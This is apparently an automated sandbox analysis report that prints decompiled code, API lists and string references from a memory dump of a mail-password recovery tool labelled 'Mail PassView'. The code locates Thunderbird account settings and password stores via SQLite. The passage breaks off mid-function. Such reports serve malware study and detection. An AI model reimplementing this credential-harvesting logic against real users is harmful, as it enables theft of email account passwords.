Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA

_stricmp.MSVCRT(?,SMTP_Port), ref: 004109A0
_stricmp.MSVCRT(?,NNTP_Port), ref: 004109C9
_stricmp.MSVCRT(?,IMAP_Port), ref: 004109DA
_stricmp.MSVCRT(?,POP3_Port), ref: 004109EB
_stricmp.MSVCRT(?,SMTP_Secure_Connection), ref: 00410A14
_stricmp.MSVCRT(?,NNTP_Secure_Connection), ref: 00410A3D
_stricmp.MSVCRT(?,IMAP_Secure_Connection), ref: 00410A4E
_stricmp.MSVCRT(?,POP3_Secure_Connection), ref: 00410A5F

Strings

POP3_Password2, xrefs: 00410886
IMAP_Server, xrefs: 0041073F
SMTP_Secure_Connection, xrefs: 00410A0E
IMAP_Port, xrefs: 004109D4
NNTP_Secure_Connection, xrefs: 00410A37
POP3_Server, xrefs: 00410710
NNTP_Server, xrefs: 00410768
SMTP_Password2, xrefs: 00410901
SMTP_Port, xrefs: 00410994
POP3_Port, xrefs: 004109E5
SMTP_Server, xrefs: 00410791
SMTP_User_Name, xrefs: 00410853
IMAP_User_Name, xrefs: 004107ED
IMAP_Secure_Connection, xrefs: 00410A48
Account_Name, xrefs: 004106CA
NNTP_Port, xrefs: 004109C3
NNTP_Email_Address, xrefs: 0041092A
NNTP_User_Name, xrefs: 00410820
IMAP_Password2, xrefs: 004108AF
POP3_User_Name, xrefs: 004107BA
POP3_Secure_Connection, xrefs: 00410A59
NNTP_Password2, xrefs: 004108D8
SMTP_Email_Address, xrefs: 00410953

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: strcmp$_stricmp$memcpystrlen
String ID: Account_Name$IMAP_Password2$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP_Email_Address$NNTP_Password2$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3_Password2$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP_Email_Address$SMTP_Password2$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
API String ID: 1113949926-2499304436
Opcode ID: 0c75f3a23bfcbdff00a9aa801863508d09b02361048c6915a7d59a784447564f
Instruction ID: 03d5d7842382467f3947e80262f6a1f2e973b0058f56c731c8fd5b97bb90a946
Opcode Fuzzy Hash: 0c75f3a23bfcbdff00a9aa801863508d09b02361048c6915a7d59a784447564f
Instruction Fuzzy Hash: D391517220870569E624B7329C02FD773E8AF9032DF21052FF55BE61D2EEADB981465C

Uniqueness

Uniqueness Score: -1.00%

Function 0040C7CF, Relevance: 61.5, APIs: 21, Strings: 14, Instructions: 232
stringCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E0040C7CF(intOrPtr __ecx, void* __edx, char* _a4, char* _a8) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				void _v271;
				char _v272;
				void* __ebx;
				void* __edi;
				int _t64;
				int _t66;
				int _t68;
				int _t69;
				int _t72;
				int _t85;
				void* _t91;
				void* _t132;
				char* _t133;
				char* _t135;
				char* _t137;
				char* _t139;
				intOrPtr _t151;
				int _t153;
				int _t154;
				void* _t155;

				_t132 = __edx;
				_v12 = __ecx;
				_v272 = 0;
				memset( &_v271, 0, 0xff);
				_t133 = "mail.account.account";
				_t64 = strlen(_t133);
				_t148 = _t64;
				_t134 = _a4;
				if(strncmp(_a4, _t133, _t64) != 0) {
					_v8 = _v8 & 0x00000000;
				} else {
					_v8 = E0040C748(_t134,  &_v16, _t148);
				}
				if(_v8 != 0) {
					_push("identities");
					_push(_v8);
					L004115B2();
					if(_t91 == 0) {
						_t17 = _t155 + 0x604; // 0x604
						E004060D0(0xff, _t17, _a8);
					}
				}
				_t135 = "mail.server";
				_t66 = strlen(_t135);
				_t149 = _t66;
				_t136 = _a4;
				if(strncmp(_a4, _t135, _t66) != 0) {
					_v8 = _v8 & 0x00000000;
				} else {
					_v8 = E0040C6F3(_t149, _t136,  &_v272);
				}
				if(_v8 != 0) {
					_t85 = E0040CA7D(_v12 + 0xffffffe8, _t132,  &_v272);
					_push("username");
					_push(_v8);
					_t154 = _t85;
					L004115B2();
					if(_t85 == 0) {
						_t28 = _t154 + 0x204; // 0x204
						_t85 = E004060D0(0xff, _t28, _a8);
					}
					_push("type");
					_push(_v8);
					L004115B2();
					if(_t85 == 0) {
						_t31 = _t154 + 0x504; // 0x504
						_t85 = E004060D0(0xff, _t31, _a8);
					}
					_push("hostname");
					_push(_v8);
					L004115B2();
					if(_t85 == 0) {
						_t34 = _t154 + 0x104; // 0x104
						_t85 = E004060D0(0xff, _t34, _a8);
					}
					_push("port");
					_push(_v8);
					L004115B2();
					if(_t85 == 0) {
						_t85 = atoi(_a8);
						 *(_t154 + 0x804) = _t85;
					}
					_push("useSecAuth");
					_push(_v8);
					L004115B2();
					if(_t85 == 0) {
						_push("true");
						_push(_a8);
						L004115B2();
						if(_t85 == 0) {
							 *((intOrPtr*)(_t154 + 0x808)) = 1;
						}
					}
				}
				_t137 = "mail.identity";
				_t68 = strlen(_t137);
				_t150 = _t68;
				_t138 = _a4;
				_t69 = strncmp(_a4, _t137, _t68);
				if(_t69 != 0) {
					_v8 = _v8 & 0x00000000;
				} else {
					_t69 = E0040C6F3(_t150, _t138,  &_v272);
					_v8 = _t69;
				}
				if(_v8 != 0) {
					_t69 = E0040CA7D(_v12 + 0xffffffe8, _t132,  &_v272);
					_push("useremail");
					_push(_v8);
					_t153 = _t69;
					L004115B2();
					if(_t69 == 0) {
						_t51 = _t153 + 0x404; // 0x404
						_t69 = E004060D0(0xff, _t51, _a8);
					}
					_push("fullname");
					_push(_v8);
					L004115B2();
					if(_t69 == 0) {
						_t54 = _t153 + 4; // 0x4
						_t69 = E004060D0(0xff, _t54, _a8);
					}
				}
				_push("signon.signonfilename");
				_push(_a4);
				L004115B2();
				if(_t69 == 0) {
					_t151 = _v12;
					_t139 = _t151 + 0x245;
					_t152 = _t151 + 0x140;
					_t72 = strlen(_t151 + 0x140);
					_t60 = strlen(_a8) + 1; // 0x1
					if(_t72 + _t60 >= 0x104) {
						 *_t139 = 0;
					} else {
						E004062AD(_t139, _t152, _a8);
					}
				}
				return 1;
			}

0x0040c7cf
0x0040c7ea
0x0040c7ed
0x0040c7f4
0x0040c7f9
0x0040c7ff
0x0040c804
0x0040c808
0x0040c816
0x0040c827
0x0040c818
0x0040c822
0x0040c822
0x0040c82f
0x0040c863
0x0040c868
0x0040c86b
0x0040c874
0x0040c879
0x0040c87f
0x0040c884
0x0040c874
0x0040c885
0x0040c88b
0x0040c890
0x0040c894
0x0040c8a2
0x0040c8b7
0x0040c8a4
0x0040c8b2
0x0040c8b2
0x0040c8bf
0x0040c8d2
0x0040c8d7
0x0040c8dc
0x0040c8df
0x0040c8e1
0x0040c8ea
0x0040c8ef
0x0040c8f5
0x0040c8fa
0x0040c8fb
0x0040c900
0x0040c903
0x0040c90c
0x0040c911
0x0040c917
0x0040c91c
0x0040c91d
0x0040c922
0x0040c925
0x0040c92e
0x0040c933
0x0040c939
0x0040c93e
0x0040c93f
0x0040c944
0x0040c947
0x0040c950
0x0040c955
0x0040c95b
0x0040c95b
0x0040c961
0x0040c966
0x0040c969
0x0040c972
0x0040c974
0x0040c979
0x0040c97c
0x0040c985
0x0040c987
0x0040c987
0x0040c985
0x0040c972
0x0040c991
0x0040c997
0x0040c99c
0x0040c9a0
0x0040c9a4
0x0040c9ae
0x0040c9c3
0x0040c9b0
0x0040c9b9
0x0040c9be
0x0040c9be
0x0040c9cb
0x0040c9da
0x0040c9df
0x0040c9e4
0x0040c9e7
0x0040c9e9
0x0040c9f2
0x0040c9f7
0x0040c9fd
0x0040ca02
0x0040ca03
0x0040ca08
0x0040ca0b
0x0040ca14
0x0040ca19
0x0040ca1c
0x0040ca21
0x0040ca14
0x0040ca22
0x0040ca27
0x0040ca2a
0x0040ca33
0x0040ca35
0x0040ca38
0x0040ca3e
0x0040ca45
0x0040ca54
0x0040ca5f
0x0040ca70
0x0040ca61
0x0040ca67
0x0040ca6d
0x0040ca5f
0x0040ca7a

APIs

memset.MSVCRT ref: 0040C7F4
strlen.MSVCRT ref: 0040C7FF
strncmp.MSVCRT(?,mail.account.account,00000000,mail.account.account,?,00000000,000000FF), ref: 0040C80C
_stricmp.MSVCRT(00000000,server), ref: 0040C849
_stricmp.MSVCRT(00000000,identities), ref: 0040C86B
strlen.MSVCRT ref: 0040C88B
strncmp.MSVCRT(?,mail.server,00000000,mail.server), ref: 0040C898
_stricmp.MSVCRT(00000000,username,00000000), ref: 0040C8E1
_stricmp.MSVCRT(00000000,type,00000000), ref: 0040C903
_stricmp.MSVCRT(00000000,hostname,00000000), ref: 0040C925
_stricmp.MSVCRT(00000000,port,00000000), ref: 0040C947
atoi.MSVCRT ref: 0040C955

Part of subcall function 0040C748: memset.MSVCRT ref: 0040C77E
Part of subcall function 0040C748: memcpy.MSVCRT ref: 0040C7A0
Part of subcall function 0040C748: atoi.MSVCRT ref: 0040C7B4

_stricmp.MSVCRT(00000000,useSecAuth,00000000), ref: 0040C969
_stricmp.MSVCRT(?,true,00000000), ref: 0040C97C
strlen.MSVCRT ref: 0040C997
strncmp.MSVCRT(?,mail.identity,00000000,mail.identity), ref: 0040C9A4
_stricmp.MSVCRT(00000000,useremail,00000000), ref: 0040C9E9
_stricmp.MSVCRT(00000000,fullname,00000000), ref: 0040CA0B
_stricmp.MSVCRT(?,signon.signonfilename), ref: 0040CA2A
strlen.MSVCRT ref: 0040CA45
strlen.MSVCRT ref: 0040CA4F

Strings

mail.identity, xrefs: 0040C991, 0040C996, 0040C99F
username, xrefs: 0040C8D7
useSecAuth, xrefs: 0040C961
mail.account.account, xrefs: 0040C7F9, 0040C807
server, xrefs: 0040C83F
fullname, xrefs: 0040CA03
type, xrefs: 0040C8FB
signon.signonfilename, xrefs: 0040CA22
true, xrefs: 0040C974
hostname, xrefs: 0040C91D
port, xrefs: 0040C93F
identities, xrefs: 0040C863
useremail, xrefs: 0040C9DF
mail.server, xrefs: 0040C885, 0040C88A, 0040C893

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _stricmp$strlen$strncmp$atoimemset$memcpy
String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$port$server$signon.signonfilename$true$type$useSecAuth$useremail$username
API String ID: 736090197-593045482
Opcode ID: fa6975b133b13f5067aa23c0df6e7e68559b1782356a0831ed68d1fdd542dc29
Instruction ID: 8e23c8f9271997a3be880b93158be8956f510041fead3e1da2e0ecaa9a645c54
Opcode Fuzzy Hash: fa6975b133b13f5067aa23c0df6e7e68559b1782356a0831ed68d1fdd542dc29
Instruction Fuzzy Hash: E271C972504204FADF10EB65CC42BDE77A6DF50329F20426BF506B21E1EB79AF819A5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040F64B, Relevance: 56.1, APIs: 20, Strings: 12, Instructions: 127
libraryloaderstringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040F64B(intOrPtr* __esi, char* _a4) {
				void _v283;
				char _v284;
				void _v547;
				char _v548;
				struct HINSTANCE__* _t45;
				struct HINSTANCE__* _t46;
				struct HINSTANCE__* _t57;
				struct HINSTANCE__* _t68;
				CHAR* _t79;
				intOrPtr* _t81;

				_t81 = __esi;
				if( *((intOrPtr*)(__esi + 0x24)) != 0) {
					L14:
					return 1;
				}
				_v284 = 0;
				memset( &_v283, 0, 0x117);
				if(_a4 == 0) {
					E0040F435( &_v284);
				} else {
					strcpy( &_v284, _a4);
				}
				if(_v284 == 0) {
					_t79 = "sqlite3.dll";
					_t45 = GetModuleHandleA(_t79);
					 *(_t81 + 0x24) = _t45;
					if(_t45 != 0) {
						goto L12;
					}
					_t57 = LoadLibraryA(_t79);
					goto L11;
				} else {
					_v548 = 0;
					memset( &_v547, 0, 0x104);
					strcpy( &_v548,  &_v284);
					strcat( &_v284, "\\sqlite3.dll");
					if(E0040614B( &_v284) == 0) {
						strcpy( &_v284,  &_v548);
						strcat( &_v284, "\\mozsqlite3.dll");
					}
					_t68 = GetModuleHandleA( &_v284);
					 *(_t81 + 0x24) = _t68;
					if(_t68 != 0) {
						L12:
						_t46 =  *(_t81 + 0x24);
						if(_t46 == 0) {
							return 0;
						}
						 *_t81 = GetProcAddress(_t46, "sqlite3_open");
						 *((intOrPtr*)(_t81 + 4)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_prepare");
						 *((intOrPtr*)(_t81 + 8)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_step");
						 *((intOrPtr*)(_t81 + 0xc)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_column_text");
						 *((intOrPtr*)(_t81 + 0x10)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_column_int");
						 *((intOrPtr*)(_t81 + 0x14)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_column_int64");
						 *((intOrPtr*)(_t81 + 0x18)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_finalize");
						 *((intOrPtr*)(_t81 + 0x1c)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_close");
						 *((intOrPtr*)(_t81 + 0x20)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_exec");
						goto L14;
					} else {
						_t57 = LoadLibraryExA( &_v284, 0, 8);
						L11:
						 *(_t81 + 0x24) = _t57;
						goto L12;
					}
				}
			}

0x0040f64b
0x0040f65b
0x0040f7e1
0x00000000
0x0040f7e3
0x0040f66e
0x0040f674
0x0040f685
0x0040f694
0x0040f687
0x0040f68b
0x0040f691
0x0040f69f
0x0040f741
0x0040f747
0x0040f74f
0x0040f752
0x00000000
0x00000000
0x0040f755
0x00000000
0x0040f6a5
0x0040f6b2
0x0040f6b8
0x0040f6cb
0x0040f6dc
0x0040f6f2
0x0040f702
0x0040f713
0x0040f718
0x0040f722
0x0040f72a
0x0040f72d
0x0040f75e
0x0040f75e
0x0040f763
0x00000000
0x0040f7ea
0x0040f77f
0x0040f78b
0x0040f798
0x0040f7a5
0x0040f7b2
0x0040f7bf
0x0040f7cc
0x0040f7d9
0x0040f7de
0x00000000
0x0040f72f
0x0040f739
0x0040f75b
0x0040f75b
0x00000000
0x0040f75b
0x0040f72d

APIs

memset.MSVCRT ref: 0040F674
strcpy.MSVCRT(?,?,?,?,00000000), ref: 0040F68B
memset.MSVCRT ref: 0040F6B8
strcpy.MSVCRT(?,?,?,00000000,00000104,?,?,00000000), ref: 0040F6CB
strcat.MSVCRT(?,\sqlite3.dll,?,?,?,00000000,00000104,?,?,00000000), ref: 0040F6DC
strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F702
strcat.MSVCRT(?,\mozsqlite3.dll,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F713
GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F722
LoadLibraryExA.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F739
GetModuleHandleA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040F747
LoadLibraryA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040F755
GetProcAddress.KERNEL32(?,sqlite3_open), ref: 0040F775
GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 0040F781
GetProcAddress.KERNEL32(?,sqlite3_step), ref: 0040F78E
GetProcAddress.KERNEL32(?,sqlite3_column_text), ref: 0040F79B
GetProcAddress.KERNEL32(?,sqlite3_column_int), ref: 0040F7A8
GetProcAddress.KERNEL32(?,sqlite3_column_int64), ref: 0040F7B5
GetProcAddress.KERNEL32(?,sqlite3_finalize), ref: 0040F7C2
GetProcAddress.KERNEL32(?,sqlite3_close), ref: 0040F7CF
GetProcAddress.KERNEL32(?,sqlite3_exec), ref: 0040F7DC

Strings

sqlite3_exec, xrefs: 0040F7D1
\mozsqlite3.dll, xrefs: 0040F70D
sqlite3_prepare, xrefs: 0040F777
sqlite3_column_text, xrefs: 0040F790
sqlite3_open, xrefs: 0040F76F
sqlite3.dll, xrefs: 0040F741, 0040F746, 0040F754
sqlite3_column_int64, xrefs: 0040F7AA
sqlite3_finalize, xrefs: 0040F7B7
sqlite3_step, xrefs: 0040F783
sqlite3_close, xrefs: 0040F7C4
sqlite3_column_int, xrefs: 0040F79D
\sqlite3.dll, xrefs: 0040F6D6

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressProc$strcpy$HandleLibraryLoadModulememsetstrcat
String ID: \mozsqlite3.dll$\sqlite3.dll$sqlite3.dll$sqlite3_close$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_exec$sqlite3_finalize$sqlite3_open$sqlite3_prepare$sqlite3_step
API String ID: 3567885941-2042458128
Opcode ID: bd0ce2e375925359ec1219c205f3dbe1c8e580fb1eb91f69f3ac3bcbec633a35
Instruction ID: 8fd3bcd04759d815ffa5d5b817f34976dc276f641444eb2ebd63b60ef60fef8a
Opcode Fuzzy Hash: bd0ce2e375925359ec1219c205f3dbe1c8e580fb1eb91f69f3ac3bcbec633a35
Instruction Fuzzy Hash: C9416571940308AACB30AF718D85DCBBBF9AB58705F10497BE246E3550E778E685CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040E4A4, Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264
stringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040E4A4(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, struct HDC__* _a16, long _a20, long _a24, intOrPtr _a28, signed int _a32, long _a36, intOrPtr _a40, struct tagPOINT _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, struct tagPOINT _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, char _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, long _a96, struct tagPOINT _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, struct tagSIZE _a116, struct tagRECT _a124, intOrPtr _a128, intOrPtr _a136, char _a336) {
				signed int _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v28;
				intOrPtr _v44;
				struct HWND__* _v48;
				struct HWND__* _v52;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				struct HDC__* _t169;
				struct HWND__* _t171;
				intOrPtr _t223;
				void* _t224;
				intOrPtr _t235;
				struct HWND__* _t237;
				void* _t240;
				intOrPtr* _t274;
				signed int _t275;
				signed int _t276;

				_t274 = __esi;
				_t276 = _t275 & 0xfffffff8;
				E004118A0(0x2198, __ecx);
				_a12 =  *((intOrPtr*)( *((intOrPtr*)(__esi + 0x10)) + 0x1b4));
				_t237 = GetDlgItem( *(__esi + 4), 0x3e9);
				_a4 = GetDlgItem( *(__esi + 4), 0x3e8);
				_a20 = GetWindowLongA(_t237, 0xfffffff0);
				_a24 = GetWindowLongA(_a4, 0xfffffff0);
				_a96 = GetWindowLongA(_t237, 0xffffffec);
				_a36 = GetWindowLongA(_a4, 0xffffffec);
				GetWindowRect(_t237,  &_a100);
				GetWindowRect(_a4,  &_a60);
				MapWindowPoints(0,  *(__esi + 4),  &_a100, 2);
				MapWindowPoints(0,  *(__esi + 4),  &_a60, 2);
				_t240 = _a108 - _a100.x;
				_a4 = _a4 & 0x00000000;
				_a28 = _a68 - _a60.x;
				_a76 = _a112 - _a104;
				_a40 = _a72 - _a64;
				_t169 = GetDC( *(__esi + 4));
				_a16 = _t169;
				if(_t169 == 0) {
					L9:
					_v0 = _v0 & 0x00000000;
					if( *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)) <= 0) {
						L12:
						_t171 = GetDlgItem( *(_t274 + 4), 1);
						_a36 = _t171;
						GetWindowRect(_t171,  &_a44);
						MapWindowPoints(0,  *(_t274 + 4),  &_a44, 2);
						GetClientRect( *(_t274 + 4),  &_a124);
						GetWindowRect( *(_t274 + 4),  &_a80);
						SetWindowPos( *(_t274 + 4), 0, 0, 0, _a88 - _a80 + 1, _a128 - _a136 - _a48 - _a84 + _a56 + _a92 + _a4 + 0x15, 0x206);
						GetClientRect( *(_t274 + 4),  &_a80);
						return SetWindowPos(_a36, 0, _a44.x, _a48 - _a56 - _a84 + _a92 - 5, _a52 - _a44 + 1, _a56 - _a48 + 1, 0x204);
					}
					_a20 = _a20 | 0x10000000;
					_a24 = _a24 | 0x10000000;
					_a8 = _a12 + 0x10;
					do {
						 *((intOrPtr*)( *_t274 + 0x1c))(_v0);
						_v20 = E00401562(_t274, _a92, "STATIC", _a16, _a96, _v0 + _a100.x, _t240, _a72);
						_v44 = E00401562(_t274, _a4, "EDIT", _v8, _a28, _v28 + _a32, _v4,  *(_t274 + 0x14) * _a8);
						sprintf( &_a80, "%s:", _v52->i);
						_t276 = _t276 + 0xc;
						SetWindowTextA(_v48,  &_a80);
						SetWindowTextA(_v52,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t274 + 0xc))))))(_v60,  &_a336));
						_v60 = _v60 + 0x14;
						_v64 = _v64 +  *(_t274 + 0x14) * _v28 +  *((intOrPtr*)(_t274 + 0x18));
						_v68 = _v68 + 1;
					} while (_v68 <  *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)));
					goto L12;
				}
				_t223 = 0;
				_a32 = _a32 & 0;
				_a8 = 0;
				if( *((intOrPtr*)( *((intOrPtr*)(__esi + 0x10)) + 0x1b0)) <= 0) {
					L8:
					_t224 = _t223 - _t240;
					_a28 = _a28 - _t224;
					_a60.x = _a60.x + _t224;
					_t240 = _t240 + _t224;
					ReleaseDC( *(_t274 + 4), _a16);
					goto L9;
				}
				_v0 = _a12 + 0x10;
				do {
					if(GetTextExtentPoint32A(_a16,  *_v0, strlen( *_v0),  &_a116) != 0) {
						_t235 = _a100.x + 0xa;
						if(_t235 > _v8) {
							_v8 = _t235;
						}
					}
					_a16 =  &(_a16->i);
					_v16 = _v16 + 0x14;
				} while (_a16 <  *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)));
				_t223 = _v8;
				goto L8;
			}

0x0040e4a4
0x0040e4a7
0x0040e4af
0x0040e4cd
0x0040e4db
0x0040e4e8
0x0040e4f4
0x0040e4fd
0x0040e509
0x0040e515
0x0040e51f
0x0040e52a
0x0040e53e
0x0040e54c
0x0040e55d
0x0040e561
0x0040e566
0x0040e575
0x0040e581
0x0040e585
0x0040e58d
0x0040e591
0x0040e629
0x0040e62c
0x0040e638
0x0040e746
0x0040e74b
0x0040e757
0x0040e75b
0x0040e769
0x0040e780
0x0040e78a
0x0040e7d0
0x0040e7da
0x0040e819
0x0040e819
0x0040e649
0x0040e65a
0x0040e65e
0x0040e662
0x0040e66a
0x0040e69c
0x0040e6cc
0x0040e6e3
0x0040e6e8
0x0040e6f7
0x0040e715
0x0040e726
0x0040e72b
0x0040e72f
0x0040e73a
0x00000000
0x0040e662
0x0040e59a
0x0040e59c
0x0040e5a6
0x0040e5aa
0x0040e610
0x0040e614
0x0040e619
0x0040e61d
0x0040e621
0x0040e623
0x00000000
0x0040e623
0x0040e5b3
0x0040e5b7
0x0040e5de
0x0040e5e7
0x0040e5ee
0x0040e5f0
0x0040e5f0
0x0040e5ee
0x0040e5f4
0x0040e5ff
0x0040e604
0x0040e60c
0x00000000

APIs

GetDlgItem.USER32 ref: 0040E4D1
GetDlgItem.USER32 ref: 0040E4DD
GetWindowLongA.USER32 ref: 0040E4EC
GetWindowLongA.USER32 ref: 0040E4F8
GetWindowLongA.USER32 ref: 0040E501
GetWindowLongA.USER32 ref: 0040E50D
GetWindowRect.USER32 ref: 0040E51F
GetWindowRect.USER32 ref: 0040E52A
MapWindowPoints.USER32 ref: 0040E53E
MapWindowPoints.USER32 ref: 0040E54C
GetDC.USER32 ref: 0040E585
strlen.MSVCRT ref: 0040E5C5
GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 0040E5D6
ReleaseDC.USER32 ref: 0040E623
sprintf.MSVCRT ref: 0040E6E3
SetWindowTextA.USER32(?,?), ref: 0040E6F7
SetWindowTextA.USER32(?,00000000), ref: 0040E715
GetDlgItem.USER32 ref: 0040E74B
GetWindowRect.USER32 ref: 0040E75B
MapWindowPoints.USER32 ref: 0040E769
GetClientRect.USER32 ref: 0040E780
GetWindowRect.USER32 ref: 0040E78A
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0040E7D0
GetClientRect.USER32 ref: 0040E7DA
SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0040E812

Strings

STATIC, xrefs: 0040E687
%s:, xrefs: 0040E6DD
EDIT, xrefs: 0040E6BE

Memory Dump Source

Source File: 0000000B.00000002.321594034.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.321610975.0000000000418000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
String ID: %s:$EDIT$STATIC
API String ID: 1703216249-3046471546
Opcode ID: 63f961038f13364f7976eadaedf26f00b3f2f6ee041d7cedeb7d286e156d3b6f
Instruction ID: 2f6da9a5868e125b8128a3bf626dfa5428397bb468519cd7ccc35e9b597c58da
Opcode Fuzzy Hash: 63f961038f13364f7976eadaedf26f00b3f2f6ee041d7cedeb7d286e156d3b6f
Instruction Fuzzy Hash: C9B1DE71108341AFD710DFA8C985A6BBBE9FF88704F008A2DF699D2260D775E814CF16

Uniqueness

Uniqueness Score: -1.00%

Function 004010E5, Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 176
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E004010E5(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void* __esi;
				void* _t47;
				struct HBRUSH__* _t56;
				void* _t61;
				unsigned int _t62;
				void* _t67;
				struct HWND__* _t68;
				struct HWND__* _t69;
				void* _t72;
				unsigned int _t73;
				struct HWND__* _t75;
				struct HWND__* _t76;
				struct HWND__* _t77;
				struct HWND__* _t78;
				unsigned int _t83;
				struct HWND__* _t85;
				struct HWND__* _t87;
				struct HWND__* _t88;
				struct tagPOINT _t94;
				struct tagPOINT _t96;
				void* _t102;
				void* _t113;

				_t102 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t47 = _a4 - 0x110;
				_t113 = __ecx;
				if(_t47 == 0) {
					__eflags =  *0x417348;
					if(__eflags != 0) {
						SetDlgItemTextA( *(__ecx + 4), 0x3ee, 0x417348);
					} else {
						ShowWindow(GetDlgItem( *(__ecx + 4), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t113 + 4), 0x3ee), 0);
					}
					SetWindowTextA( *(_t113 + 4), "Mail PassView");
					SetDlgItemTextA( *(_t113 + 4), 0x3ea, _t113 + 0xc);
					SetDlgItemTextA( *(_t113 + 4), 0x3ec, _t113 + 0x10b);
					E00401085(_t113, __eflags);
					E00406491(_t102,  *(_t113 + 4));
					goto L29;
				} else {
					_t61 = _t47 - 1;
					if(_t61 == 0) {
						_t62 = _a8;
						__eflags = _t62 - 1;
						if(_t62 != 1) {
							goto L29;
						} else {
							__eflags = _t62 >> 0x10;
							if(_t62 >> 0x10 != 0) {
								goto L29;
							} else {
								EndDialog( *(__ecx + 4), 1);
								DeleteObject( *(_t113 + 0x20c));
								goto L8;
							}
						}
					} else {
						_t67 = _t61 - 0x27;
						if(_t67 == 0) {
							_t68 = GetDlgItem( *(__ecx + 4), 0x3ec);
							__eflags = _a12 - _t68;
							if(_a12 != _t68) {
								__eflags =  *0x417388;
								if( *0x417388 == 0) {
									goto L29;
								} else {
									_t69 = GetDlgItem( *(_t113 + 4), 0x3ee);
									__eflags = _a12 - _t69;
									if(_a12 != _t69) {
										goto L29;
									} else {
										goto L18;
									}
								}
							} else {
								L18:
								SetBkMode(_a8, 1);
								SetTextColor(_a8, 0xc00000);
								_t56 = GetSysColorBrush(0xf);
							}
						} else {
							_t72 = _t67 - 0xc8;
							if(_t72 == 0) {
								_t73 = _a12;
								_t94 = _t73 & 0x0000ffff;
								_v12.x = _t94;
								_v12.y = _t73 >> 0x10;
								_t75 = GetDlgItem( *(__ecx + 4), 0x3ec);
								_push(_v12.y);
								_a8 = _t75;
								_t76 = ChildWindowFromPoint( *(_t113 + 4), _t94);
								__eflags = _t76 - _a8;
								if(_t76 != _a8) {
									__eflags =  *0x417388;
									if( *0x417388 == 0) {
										goto L29;
									} else {
										_t77 = GetDlgItem( *(_t113 + 4), 0x3ee);
										_push(_v12.y);
										_t78 = ChildWindowFromPoint( *(_t113 + 4), _v12.x);
										__eflags = _t78 - _t77;
										if(_t78 != _t77) {
											goto L29;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									SetCursor(LoadCursorA( *0x416b94, 0x67));
									goto L8;
								}
							} else {
								if(_t72 != 0) {
									L29:
									_t56 = 0;
									__eflags = 0;
								} else {
									_t83 = _a12;
									_t96 = _t83 & 0x0000ffff;
									_v12.x = _t96;
									_v12.y = _t83 >> 0x10;
